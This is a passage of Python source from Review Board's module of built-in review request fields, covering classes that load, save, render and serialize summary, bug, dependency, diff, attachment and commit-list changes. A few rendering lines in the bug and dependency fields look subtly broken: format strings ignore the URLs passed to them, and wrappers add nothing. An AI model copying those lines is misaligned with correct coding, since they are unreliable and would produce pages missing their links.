\n\n def serialize_change_entry(self, changedesc):\n \"\"\"Serialize a change entry for public consumption.\n\n This will output a version of the change entry for use in the API.\n It can be the same content stored in the\n :py:class:`~reviewboard.changedescs.models.ChangeDescription`, but\n does not need to be.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description whose field is to be serialized.\n\n Returns:\n list:\n An appropriate serialization for the field.\n \"\"\"\n data = changedesc.fields_changed[self.field_id]\n\n return [\n {\n 'old': data[str(obj.pk)]['old'][0],\n 'new': data[str(obj.pk)]['new'][0],\n self.caption_object_field: obj,\n }\n for obj in self.model.objects.filter(pk__in=data.keys())\n ]\n\n\nclass BaseModelListEditableField(BaseCommaEditableField):\n \"\"\"Base class for editable comma-separated list of model instances.\n\n This is used for built-in classes that work with ManyToManyFields.\n \"\"\"\n\n model_name_attr = None\n\n def has_value_changed(self, old_value, new_value):\n \"\"\"Return whether the value has changed.\n\n Args:\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n\n Returns:\n bool:\n Whether the value of the field has changed.\n \"\"\"\n old_values = set([obj.pk for obj in old_value])\n new_values = set([obj.pk for obj in new_value])\n\n return old_values.symmetric_difference(new_values)\n\n def record_change_entry(self, changedesc, old_value, new_value):\n \"\"\"Record information on the changed values in a ChangeDescription.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description to record the entry in.\n\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n \"\"\"\n changedesc.record_field_change(self.field_id, old_value, new_value,\n self.model_name_attr)\n\n def render_change_entry_item_html(self, info, item):\n \"\"\"Render an item for change description HTML.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed.\n\n item (object):\n The value of the item.\n\n Returns:\n unicode:\n The rendered change entry.\n \"\"\"\n label, url, pk = item\n\n if url:\n return '<a href=\"%s\">%s</a>' % (escape(url), escape(label))\n else:\n return escape(label)\n\n def save_value(self, value):\n \"\"\"Save the value in the review request or draft.\n\n Args:\n value (object):\n The new value for the field.\n \"\"\"\n setattr(self, self.field_id, value)\n\n\nclass StatusField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Status field on a review request.\"\"\"\n\n field_id = 'status'\n label = _('Status')\n is_required = True\n\n #: Whether the field should be rendered.\n should_render = False\n\n def get_change_entry_sections_html(self, info):\n \"\"\"Return sections of change entries with titles and rendered HTML.\n\n Because the status field is specially handled, this just returns an\n empty list.\n \"\"\"\n return []\n\n\nclass SummaryField(BuiltinFieldMixin, BaseEditableField):\n \"\"\"The Summary field on a review request.\"\"\"\n\n field_id = 'summary'\n label = _('Summary')\n is_required = True\n tag_name = 'h1'\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.SummaryFieldView'\n\n\nclass DescriptionField(BuiltinTextAreaFieldMixin, BaseTextAreaField):\n \"\"\"The Description field on a review request.\"\"\"\n\n field_id = 'description'\n label = _('Description')\n is_required = True\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.DescriptionFieldView'\n\n def is_text_markdown(self, value):\n \"\"\"Return whether the description uses Markdown.\n\n Returns:\n bool:\n True if the description field should be formatted using Markdown.\n \"\"\"\n return self.review_request_details.description_rich_text\n\n\nclass TestingDoneField(BuiltinTextAreaFieldMixin, BaseTextAreaField):\n \"\"\"The Testing Done field on a review request.\"\"\"\n\n field_id = 'testing_done'\n label = _('Testing Done')\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.TestingDoneFieldView'\n\n def is_text_markdown(self, value):\n \"\"\"Return whether the testing done text uses Markdown.\n\n Returns:\n bool:\n True if the testing done field should be formatted using Markdown.\n \"\"\"\n return self.review_request_details.testing_done_rich_text\n\n\nclass OwnerField(BuiltinFieldMixin, BaseEditableField):\n \"\"\"The Owner field on a review request.\"\"\"\n\n field_id = 'submitter'\n label = _('Owner')\n model = User\n model_name_attr = 'username'\n is_required = True\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.OwnerFieldView'\n\n def render_value(self, user):\n \"\"\"Render the value in the field.\n\n Args:\n user (django.contrib.auth.models.User):\n The value to render.\n\n Returns:\n unicode:\n The rendered value.\n \"\"\"\n return format_html(\n '<a href=\"{0}\">{1}</a>',\n local_site_reverse(\n 'user',\n local_site=self.review_request_details.local_site,\n args=[user]),\n user.get_profile().get_display_name(self.request.user))\n\n def record_change_entry(self, changedesc, old_value, new_value):\n \"\"\"Record information on the changed values in a ChangeDescription.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description to record the entry in.\n\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n \"\"\"\n changedesc.record_field_change(self.field_id, old_value, new_value,\n self.model_name_attr)\n\n def render_change_entry_value_html(self, info, item):\n \"\"\"Render the value for a change description string to HTML.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed.\n\n item (object):\n The value of the field.\n\n Returns:\n unicode:\n The rendered change entry.\n \"\"\"\n label, url, pk = item\n\n if url:\n return '<a href=\"%s\">%s</a>' % (escape(url), escape(label))\n else:\n return escape(label)\n\n def serialize_change_entry(self, changedesc):\n \"\"\"Serialize a change entry for public consumption.\n\n This will output a version of the change entry for use in the API.\n It can be the same content stored in the\n :py:class:`~reviewboard.changedescs.models.ChangeDescription`, but\n does not need to be.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description whose field is to be serialized.\n\n Returns:\n dict:\n An appropriate serialization for the field.\n \"\"\"\n entry = super(OwnerField, self).serialize_change_entry(changedesc)\n\n return {\n key: value[0]\n for key, value in entry.items()\n }\n\n\nclass RepositoryField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Repository field on a review request.\"\"\"\n\n field_id = 'repository'\n label = _('Repository')\n model = Repository\n\n @property\n def should_render(self):
\"\"\"Whether the field should be rendered.\"\"\"\n review_request = self.review_request_details.get_review_request()\n\n return review_request.repository_id is not None\n\n\nclass BranchField(BuiltinFieldMixin, BaseEditableField):\n \"\"\"The Branch field on a review request.\"\"\"\n\n field_id = 'branch'\n label = _('Branch')\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.BranchFieldView'\n\n\nclass BugsField(BuiltinFieldMixin, BaseCommaEditableField):\n \"\"\"The Bugs field on a review request.\"\"\"\n\n field_id = 'bugs_closed'\n label = _('Bugs')\n\n one_line_per_change_entry = False\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.BugsFieldView'\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n return review_request_details.get_bug_list()\n\n def save_value(self, value):\n \"\"\"Save the value in the review request or draft.\n\n Args:\n value (object):\n The new value for the field.\n \"\"\"\n serialized_value = ', '.join(value)\n serialized_value = serialized_value.replace('\\n', '').replace('\\r', '')\n setattr(self.review_request_details, self.field_id, serialized_value)\n\n def render_item(self, bug_id):\n \"\"\"Render an item from the list.\n\n Args:\n item (object):\n The item to render.\n\n Returns:\n unicode:\n The rendered item.\n \"\"\"\n bug_url = self._get_bug_url(bug_id)\n\n if bug_url:\n return format_html('{id}',\n url=bug_url, id=bug_id)\n else:\n return escape(bug_id)\n\n def render_change_entry_item_html(self, info, item):\n \"\"\"Render an item for change description HTML.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed.\n\n item (object):\n The value of the item.\n\n Returns:\n unicode:\n The rendered change entry.\n \"\"\"\n return self.render_item(item[0])\n\n def _get_bug_url(self, bug_id):\n \"\"\"Return the URL to link to a specific bug.\n\n Args:\n bug_id (unicode):\n The ID of the bug to link to.\n\n Returns:\n unicode:\n The link to view the bug in the bug tracker, if available.\n \"\"\"\n review_request = self.review_request_details.get_review_request()\n repository = self.review_request_details.repository\n local_site_name = None\n bug_url = None\n\n if review_request.local_site:\n local_site_name = review_request.local_site.name\n\n try:\n if (repository and\n repository.bug_tracker and\n '%s' in repository.bug_tracker):\n bug_url = local_site_reverse(\n 'bug_url', local_site_name=local_site_name,\n args=[review_request.display_id, bug_id])\n except NoReverseMatch:\n pass\n\n return bug_url\n\n\nclass DependsOnField(BuiltinFieldMixin, BaseModelListEditableField):\n \"\"\"The Depends On field on a review request.\"\"\"\n\n field_id = 'depends_on'\n label = _('Depends On')\n model = ReviewRequest\n model_name_attr = 'summary'\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.DependsOnFieldView'\n\n def render_change_entry_item_html(self, info, item):\n \"\"\"Render an item for change description HTML.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed.\n\n item (object):\n The value of the item.\n\n Returns:\n unicode:\n The rendered change entry.\n 
\"\"\"\n item = ReviewRequest.objects.get(pk=item[2])\n\n rendered_item = format_html(\n '{id} - {summary}',\n url=item.get_absolute_url(),\n id=item.pk,\n summary=item.summary)\n\n if item.status in (ReviewRequest.SUBMITTED,\n ReviewRequest.DISCARDED):\n return '%s' % rendered_item\n else:\n return rendered_item\n\n def render_item(self, item):\n \"\"\"Render an item from the list.\n\n Args:\n item (object):\n The item to render.\n\n Returns:\n unicode:\n The rendered item.\n \"\"\"\n rendered_item = format_html(\n '{id}',\n url=item.get_absolute_url(),\n summary=item.summary,\n id=item.display_id)\n\n if item.status in (ReviewRequest.SUBMITTED,\n ReviewRequest.DISCARDED):\n return '%s' % rendered_item\n else:\n return rendered_item\n\n\nclass BlocksField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Blocks field on a review request.\"\"\"\n\n field_id = 'blocks'\n label = _('Blocks')\n model = ReviewRequest\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n return review_request_details.get_review_request().get_blocks()\n\n @property\n def should_render(self):\n \"\"\"Whether the field should be rendered.\"\"\"\n return len(self.value) > 0\n\n def render_value(self, blocks):\n \"\"\"Render the value in the field.\n\n Args:\n blocks (list):\n The value to render.\n\n Returns:\n unicode:\n The rendered value.\n \"\"\"\n return format_html_join(\n ', ',\n '{1}',\n [\n (item.get_absolute_url(), item.display_id)\n for item in blocks\n ])\n\n\nclass ChangeField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Change field on a review request.\n\n This is shown for repositories supporting changesets. The change\n number is similar to a commit ID, with the exception that it's only\n ever stored on the ReviewRequest and never changes.\n\n If both ``changenum`` and ``commit_id`` are provided on the review\n request, only this field will be shown, as both are likely to have\n values.\n \"\"\"\n\n field_id = 'changenum'\n label = _('Change')\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n return review_request_details.get_review_request().changenum\n\n @property\n def should_render(self):\n \"\"\"Whether the field should be rendered.\"\"\"\n return bool(self.value)\n\n def render_value(self, changenum):\n \"\"\"Render the value in the field.\n\n Args:\n changenum (unicode):\n The value to render.\n\n Returns:\n unicode:\n The rendered value.\n \"\"\"\n review_request = self.review_request_details.get_review_request()\n\n is_pending, changenum = review_request.changeset_is_pending(changenum)\n\n if is_pending:\n return escape(_('%s (pending)') % changenum)\n else:\n return changenum\n\n\nclass CommitField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Commit field on a review request.\n\n This displays the ID of the commit the review request is representing.\n\n Since the ``commit_id`` and ``changenum`` fields are both populated, we\n let ChangeField take precedence. 
\n\nclass CommitField(BuiltinFieldMixin, BaseReviewRequestField):\n \"\"\"The Commit field on a review request.\n\n This displays the ID of the commit the review request is representing.\n\n Since the ``commit_id`` and ``changenum`` fields are both populated, we\n let ChangeField take precedence. It knows how to render information based\n on a changeset ID.\n \"\"\"\n\n field_id = 'commit_id'\n label = _('Commit')\n can_record_change_entry = True\n tag_name = 'span'\n\n @property\n def should_render(self):\n \"\"\"Whether the field should be rendered.\"\"\"\n return (bool(self.value) and\n not self.review_request_details.get_review_request().changenum)\n\n def render_value(self, commit_id):\n \"\"\"Render the value in the field.\n\n Args:\n commit_id (unicode):\n The value to render.\n\n Returns:\n unicode:\n The rendered value.\n \"\"\"\n # Abbreviate SHA-1s\n if len(commit_id) == 40:\n abbrev_commit_id = commit_id[:7] + '...'\n\n return '<span title=\"%s\">%s</span>' % (escape(commit_id),\n escape(abbrev_commit_id))\n else:\n return escape(commit_id)\n\n\nclass DiffField(ReviewRequestPageDataMixin, BuiltinFieldMixin,\n BaseReviewRequestField):\n \"\"\"Represents a newly uploaded diff on a review request.\n\n This is not shown as an actual displayable field on the review request\n itself. Instead, it is used only during the ChangeDescription population\n and processing steps.\n \"\"\"\n\n field_id = 'diff'\n label = _('Diff')\n\n can_record_change_entry = True\n\n MAX_FILES_PREVIEW = 8\n\n def render_change_entry_html(self, info):\n \"\"\"Render a change entry to HTML.\n\n This function is expected to return safe, valid HTML. Any values\n coming from a field or any other form of user input must be\n properly escaped.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed. This is\n guaranteed to have ``new`` and ``old`` keys, but may also\n contain ``added`` and ``removed`` keys as well.\n\n Returns:\n unicode:\n The HTML representation of the change entry.\n \"\"\"\n added_diff_info = info['added'][0]\n review_request = self.review_request_details.get_review_request()\n\n try:\n diffset = self.data.diffsets_by_id[added_diff_info[2]]\n except KeyError:\n # If a published revision of a diff has been deleted from the\n # database, this will explode. Just return a blank string for this,\n # so that it doesn't show a traceback.\n return ''\n\n diff_revision = diffset.revision\n past_revision = diff_revision - 1\n diff_url = added_diff_info[1]\n\n s = []\n\n # Fetch the total number of inserts/deletes. These will be shown\n # alongside the diff revision.\n counts = diffset.get_total_line_counts()\n raw_insert_count = counts.get('raw_insert_count', 0)\n raw_delete_count = counts.get('raw_delete_count', 0)\n\n line_counts = []\n\n if raw_insert_count > 0:\n line_counts.append('<span class=\"insert-count\">+%d</span>'\n % raw_insert_count)\n\n if raw_delete_count > 0:\n line_counts.append('<span class=\"delete-count\">-%d</span>'\n % raw_delete_count)\n\n # Display the label, URL, and line counts for the diff.\n s.append(format_html(\n '<p class=\"diff-changes\">'\n ' <a href=\"{url}\">{label}</a>'\n ' <span class=\"line-counts\">({line_counts})</span>'\n '</p>',\n url=diff_url,\n label=_('Revision %s') % diff_revision,\n count=_('%d files') % len(diffset.cumulative_files),\n line_counts=mark_safe(' '.join(line_counts))))\n\n if past_revision > 0:\n # This is not the first diff revision. Include an interdiff link.\n interdiff_url = local_site_reverse(\n 'view-interdiff',\n local_site=review_request.local_site,\n args=[\n review_request.display_id,\n past_revision,\n diff_revision,\n ])\n\n s.append(format_html(\n '<p><a href=\"{url}\">{text}</a></p>',\n url=interdiff_url,\n text=_('Show changes')))\n\n file_count = len(diffset.cumulative_files)\n\n if file_count > 0:\n # Begin displaying the list of files modified in this diff.\n # It will be capped at a fixed number (MAX_FILES_PREVIEW).\n s += [\n '<div class=\"diff-index\">',\n ' <table>',\n ]\n\n # We want a sorted list of filediffs, but tagged with the order in\n # which they come from the database, so that we can properly link\n # to the respective files in the diff viewer.\n files = get_sorted_filediffs(enumerate(diffset.cumulative_files),\n key=lambda i: i[1])\n\n for i, filediff in files[:self.MAX_FILES_PREVIEW]:\n counts = filediff.get_line_counts()\n\n data_attrs = [\n 'data-%s=\"%s\"' % (attr.replace('_', '-'), counts[attr])\n for attr in ('insert_count', 'delete_count',\n 'replace_count', 'total_line_count')\n if counts.get(attr) is not None\n ]\n\n s.append(format_html(\n '<tr {data_attrs}>'\n ' <td class=\"diff-file-info\">'\n ' <a href=\"{url}\">{filename}</a>'\n ' </td>'\n '</tr>',\n data_attrs=mark_safe(' '.join(data_attrs)),\n url=diff_url + '#%d' % i,\n filename=filediff.source_file))\n\n num_remaining = file_count - self.MAX_FILES_PREVIEW\n\n if num_remaining > 0:\n # There are more files remaining than we've shown, so show\n # the count.\n s.append(format_html(\n '<tr>'\n ' <td class=\"diff-file-info\">{text}</td>'\n '</tr>',\n text=_('%s more') % num_remaining))\n\n s += [\n ' </table>',\n '</div>',\n ]\n\n return ''.join(s)\n\n def has_value_changed(self, old_value, new_value):\n \"\"\"Return whether the value has changed.\n\n Args:\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n\n Returns:\n bool:\n Whether the value of the field has changed.\n \"\"\"\n # If there's a new diffset at all (in new_value), then it passes\n # the test.\n return new_value is not None\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (reviewboard.reviews.models.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n object:\n The loaded value.\n \"\"\"\n # This will be None for a ReviewRequest, and may have a value for\n # ReviewRequestDraft if a new diff was attached.\n return getattr(review_request_details, 'diffset', None)\n\n def save_value(self, value):\n \"\"\"Save the value in the review request or draft.\n\n Args:\n value (object):\n The new value for the field.\n \"\"\"\n # The diff is a fake field that doesn't actually exist on the review\n # request, so it doesn't make sense to save.\n pass\n\n def record_change_entry(self, changedesc, unused, diffset):\n \"\"\"Record information on the changed values in a ChangeDescription.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description to record the entry in.\n\n old_value (object):\n The old value of the field.\n\n new_value (object):\n The new value of the field.\n \"\"\"\n review_request = self.review_request_details.get_review_request()\n\n url = local_site_reverse(\n 'view-diff-revision',\n local_site=review_request.local_site,\n args=[review_request.display_id, diffset.revision])\n\n changedesc.fields_changed['diff'] = {\n 'added': [(\n _('Diff r%s') % diffset.revision,\n url,\n diffset.pk\n )]\n }\n\n def serialize_change_entry(self, changedesc):\n \"\"\"Serialize a change entry for public consumption.\n\n This will output a version of the change entry for use in the API.\n It can be the same content stored in the\n :py:class:`~reviewboard.changedescs.models.ChangeDescription`, but\n does not need to be.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description whose field is to be serialized.\n\n Returns:\n dict:\n An appropriate serialization for the field.\n \"\"\"\n diffset_id = changedesc.fields_changed['diff']['added'][0][2]\n\n return {\n 'added': DiffSet.objects.get(pk=diffset_id),\n }\n\n\nclass FileAttachmentCaptionsField(BaseCaptionsField):\n \"\"\"Renders caption changes for file attachments.\n\n This is not shown as an actual displayable field on the review request\n itself. Instead, it is used only during the ChangeDescription rendering\n stage. It is not, however, used for populating entries in\n ChangeDescription.\n \"\"\"\n\n field_id = 'file_captions'\n label = _('File Captions')\n obj_map_attr = 'file_attachments_by_id'\n model = FileAttachment\n caption_object_field = 'file_attachment'
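\n\n# NOTE (illustrative, not in the original source): fetching a template object\n# once and reusing it, e.g.\n# template = get_template('some/template.html')\n# html = template.render(context)\n# avoids repeating the template lookup that a render_to_string() call inside\n# a loop would perform -- the pattern FileAttachmentsField uses below.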
\n\nclass FileAttachmentsField(ReviewRequestPageDataMixin, BuiltinFieldMixin,\n BaseCommaEditableField):\n \"\"\"Renders removed or added file attachments.\n\n This is not shown as an actual displayable field on the review request\n itself. Instead, it is used only during the ChangeDescription rendering\n stage. It is not, however, used for populating entries in\n ChangeDescription.\n \"\"\"\n\n field_id = 'files'\n label = _('Files')\n model = FileAttachment\n\n thumbnail_template = 'reviews/changedesc_file_attachment.html'\n\n def get_change_entry_sections_html(self, info):\n \"\"\"Return sections of change entries with titles and rendered HTML.\n\n Args:\n info (dict):\n A dictionary describing how the field has changed. This is\n guaranteed to have ``new`` and ``old`` keys, but may also\n contain ``added`` and ``removed`` keys as well.\n\n Returns:\n list of dict:\n A list of the change entry sections.\n \"\"\"\n sections = []\n\n if 'removed' in info:\n sections.append({\n 'title': _('Removed Files'),\n 'rendered_html': mark_safe(\n self.render_change_entry_html(info['removed'])),\n })\n\n if 'added' in info:\n sections.append({\n 'title': _('Added Files'),\n 'rendered_html': mark_safe(\n self.render_change_entry_html(info['added'])),\n })\n\n return sections\n\n def render_change_entry_html(self, values):\n \"\"\"Render a change entry to HTML.\n\n This function is expected to return safe, valid HTML. Any values\n coming from a field or any other form of user input must be\n properly escaped.\n\n Args:\n values (list):\n A list of the changed file attachments. Each item is a 3-tuple\n containing the ``caption``, ``filename``, and the ``pk`` of the\n file attachment in the database.\n\n Returns:\n django.utils.safestring.SafeText:\n The HTML representation of the change entry.\n \"\"\"\n # Fetch the template ourselves only once and render it for each item,\n # instead of calling render_to_string() in the loop, so we don't\n # have to locate and parse/fetch from cache for every item.\n\n template = get_template(self.thumbnail_template)\n items = []\n\n for caption, filename, pk in values:\n if pk in self.data.file_attachments_by_id:\n attachment = self.data.file_attachments_by_id[pk]\n else:\n try:\n attachment = FileAttachment.objects.get(pk=pk)\n except FileAttachment.DoesNotExist:\n continue\n\n items.append(template.render({\n 'model_attrs': self.get_attachment_js_model_attrs(attachment),\n 'uuid': uuid.uuid4(),\n }))\n\n return mark_safe(''.join(items))\n\n def get_attachment_js_model_attrs(\n self,\n attachment: FileAttachment,\n draft: bool = False,\n ) -> Dict[str, Any]:\n \"\"\"Return attributes for the RB.FileAttachment JavaScript model.\n\n This will determine the right attributes to pass to an instance\n of :js:class:`RB.FileAttachment`, based on the provided file\n attachment.\n\n Args:\n attachment (reviewboard.attachments.models.FileAttachment):\n The file attachment to return attributes for.\n\n draft (bool, optional):\n Whether to return attributes for a draft version of the\n file attachment.\n\n Returns:\n dict:\n The resulting model attributes.\n \"\"\"\n review_request = self.review_request_details.get_review_request()\n\n model_attrs = {\n 'downloadURL': attachment.get_absolute_url(),\n 'filename': attachment.filename,\n 'id': attachment.pk,\n 'loaded': True,\n 'publishedCaption': attachment.caption,\n 'revision': attachment.attachment_revision,\n 'state': self.review_request_details.get_file_attachment_state(\n attachment).value,\n 'thumbnailHTML': attachment.thumbnail,\n }\n\n if draft:\n caption = attachment.draft_caption\n else:\n caption = attachment.caption\n\n model_attrs['caption'] = caption\n\n if attachment.attachment_history_id:\n model_attrs['attachmentHistoryID'] = \\\n attachment.attachment_history_id\n\n if self._has_usable_review_ui(review_request, 
attachment):\n model_attrs['reviewURL'] = local_site_reverse(\n 'file-attachment',\n kwargs={\n 'file_attachment_id': attachment.pk,\n 'review_request_id': review_request.display_id,\n },\n request=self.request)\n\n return model_attrs\n\n def _has_usable_review_ui(self, review_request, file_attachment):\n \"\"\"Return whether there's a usable review UI for a file attachment.\n\n This will check that a review UI exists for the file attachment and\n that it's enabled for the provided user and review request.\n\n Args:\n review_request (reviewboard.reviews.models.review_request.\n ReviewRequest):\n The review request that the file attachment is on.\n\n file_attachment (reviewboard.attachments.models.FileAttachment):\n The file attachment that review UI would review.\n\n Returns:\n bool:\n ``True`` if a review UI exists and is usable. ``False`` if the\n review UI does not exist, cannot be used, or there's an error when\n checking.\n \"\"\"\n review_ui = file_attachment.review_ui\n\n try:\n return (\n review_ui and\n review_ui.is_enabled_for(user=self.request.user,\n review_request=review_request,\n file_attachment=file_attachment))\n except Exception as e:\n logger.exception('Error when calling is_enabled_for with '\n 'FileAttachmentReviewUI %r: %s',\n review_ui, e)\n return False\n\n\nclass ScreenshotCaptionsField(BaseCaptionsField):\n \"\"\"Renders caption changes for screenshots.\n\n This is not shown as an actual displayable field on the review request\n itself. Instead, it is used only during the ChangeDescription rendering\n stage. It is not, however, used for populating entries in\n ChangeDescription.\n \"\"\"\n\n field_id = 'screenshot_captions'\n label = _('Screenshot Captions')\n obj_map_attr = 'screenshots_by_id'\n model = Screenshot\n caption_object_field = 'screenshot'\n\n\nclass ScreenshotsField(BaseCommaEditableField):\n \"\"\"Renders removed or added screenshots.\n\n This is not shown as an actual displayable field on the review request\n itself. Instead, it is used only during the ChangeDescription rendering\n stage. 
It is not, however, used for populating entries in\n ChangeDescription.\n \"\"\"\n\n field_id = 'screenshots'\n label = _('Screenshots')\n model = Screenshot\n\n\nclass TargetGroupsField(BuiltinFieldMixin, BaseModelListEditableField):\n \"\"\"The Target Groups field on a review request.\"\"\"\n\n field_id = 'target_groups'\n label = _('Groups')\n model = Group\n model_name_attr = 'name'\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.TargetGroupsFieldView'\n\n def render_item(self, group):\n \"\"\"Render an item from the list.\n\n Args:\n item (object):\n The item to render.\n\n Returns:\n unicode:\n The rendered item.\n \"\"\"\n return '<a href=\"%s\">%s</a>' % (escape(group.get_absolute_url()),\n escape(group.name))\n\n\nclass TargetPeopleField(BuiltinFieldMixin, BaseModelListEditableField):\n \"\"\"The Target People field on a review request.\"\"\"\n\n field_id = 'target_people'\n label = _('People')\n model = User\n model_name_attr = 'username'\n\n #: The class name for the JavaScript view representing this field.\n js_view_class = 'RB.ReviewRequestFields.TargetPeopleFieldView'\n\n def render_item(self, user):\n \"\"\"Render an item from the list.\n\n Args:\n item (object):\n The item to render.\n\n Returns:\n unicode:\n The rendered item.\n \"\"\"\n extra_classes = ['user']\n\n if not user.is_active:\n extra_classes.append('inactive')\n\n return format_html(\n '<a href=\"{0}\" class=\"{1}\">{2}</a>',\n local_site_reverse(\n 'user',\n local_site=self.review_request_details.local_site,\n args=[user]),\n ' '.join(extra_classes),\n user.username)\n\n\nclass CommitListField(ReviewRequestPageDataMixin, BaseReviewRequestField):\n \"\"\"The list of commits for a review request.\"\"\"\n\n field_id = 'commit_list'\n label = _('Commits')\n\n is_editable = False\n\n js_view_class = 'RB.ReviewRequestFields.CommitListFieldView'\n\n @cached_property\n def review_request_created_with_history(self):\n \"\"\"Whether the associated review request was created with history.\"\"\"\n return (\n self.review_request_details\n .get_review_request()\n .created_with_history\n )\n\n @property\n def should_render(self):\n \"\"\"Whether or not the field should be rendered.\n\n This field will only be rendered when the review request was created\n with history support. 
It is also hidden on the diff viewer page,\n because it substantially overlaps with the commit selector.\n \"\"\"\n from reviewboard.urls import diffviewer_url_names\n url_name = self.request.resolver_match.url_name\n\n return (self.value is not None and\n self.review_request_created_with_history and\n url_name not in diffviewer_url_names)\n\n @property\n def can_record_change_entry(self):\n \"\"\"Whether or not the field can record a change entry.\n\n The field can only record a change entry when the review request has\n been created with history.\n \"\"\"\n return self.review_request_created_with_history\n\n def load_value(self, review_request_details):\n \"\"\"Load a value from the review request or draft.\n\n Args:\n review_request_details (review_request_details.\n base_review_request_details.\n BaseReviewRequestDetails):\n The review request or draft.\n\n Returns:\n reviewboard.diffviewer.models.diffset.DiffSet:\n The DiffSet associated with the review request or draft.\n \"\"\"\n return review_request_details.get_latest_diffset()\n\n def save_value(self, value):\n \"\"\"Save a value to the review request.\n\n This is intentionally a no-op.\n\n Args:\n value (reviewboard.diffviewer.models.diffset.DiffSet, unused):\n The current DiffSet\n \"\"\"\n pass\n\n def render_value(self, value):\n \"\"\"Render the field for the given value.\n\n Args:\n value (int):\n The diffset primary key.\n\n returns:\n django.utils.safestring.SafeText:\n The rendered value.\n \"\"\"\n if not value:\n return ''\n\n commits = list(\n DiffCommit.objects\n .filter(diffset_id=value)\n .order_by('id')\n )\n context = self._get_common_context(commits)\n context['commits'] = commits\n\n return render_to_string(\n template_name='reviews/commit_list_field.html',\n request=self.request,\n context=context)\n\n def has_value_changed(self, old_value, new_value):\n \"\"\"Return whether or not the value has changed.\n\n Args:\n old_value (reviewboard.diffviewer.models.diffset.DiffSet):\n The primary key of the :py:class:`~reviewboard.diffviewer.\n models.diffset.DiffSet` from the review_request.\n\n new_value (reviewboard.diffviewer.models.diffset.DiffSet):\n The primary key of the :py:class:`~reviewboard.diffviewer.\n models.diffset.DiffSet` from the draft.\n\n Returns:\n bool:\n Whether or not the value has changed.\n \"\"\"\n return new_value is not None\n\n def record_change_entry(self, changedesc, old_value, new_value):\n \"\"\"Record the old and new values for this field into the changedesc.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description to record the change into.\n\n old_value (reviewboard.diffviewer.models.diffset.DiffSet):\n The previous :py:class:`~reviewboard.diffviewer.models.\n diffset.DiffSet` from the review request.\n\n new_value (reviewboard.diffviewer.models.diffset.DiffSet):\n The new :py:class:`~reviewboard.diffviewer.models.diffset.\n DiffSet` from the draft.\n \"\"\"\n changedesc.fields_changed[self.field_id] = {\n 'old': old_value and old_value.pk,\n 'new': new_value.pk,\n }\n\n def render_change_entry_html(self, info):\n \"\"\"Render the change entry HTML for this field.\n\n Args:\n info (dict):\n The change entry info for this field. 
See\n :py:meth:`record_change_entry` for the format.\n\n Returns:\n django.utils.safestring.SafeText:\n The rendered HTML.\n \"\"\"\n commits = self.data.commits_by_diffset_id\n\n if info['old']:\n old_commits = commits[info['old']]\n else:\n old_commits = []\n\n new_commits = commits[info['new']]\n\n context = self._get_common_context(chain(old_commits, new_commits))\n context.update({\n 'old_commits': old_commits,\n 'new_commits': new_commits,\n })\n\n return render_to_string(\n template_name='reviews/changedesc_commit_list.html',\n request=self.request,\n context=context)\n\n def serialize_change_entry(self, changedesc):\n \"\"\"Serialize the changed field entry for the web API.\n\n Args:\n changedesc (reviewboard.changedescs.models.ChangeDescription):\n The change description being serialized.\n\n Returns:\n dict:\n A JSON-serializable dictionary representing the change entry for\n this field.\n \"\"\"\n info = changedesc.fields_changed[self.field_id]\n\n commits_by_diffset_id = DiffCommit.objects.by_diffset_ids(\n (info['old'], info['new']))\n\n return {\n key: [\n {\n 'author': commit.author_name,\n 'summary': commit.summary,\n }\n for commit in commits_by_diffset_id[info[key]]\n ]\n for key in ('old', 'new')\n }\n\n def _get_common_context(self, commits):\n \"\"\"Return common context for rendering both change entries and the field.\n\n Args:\n commits (iterable of 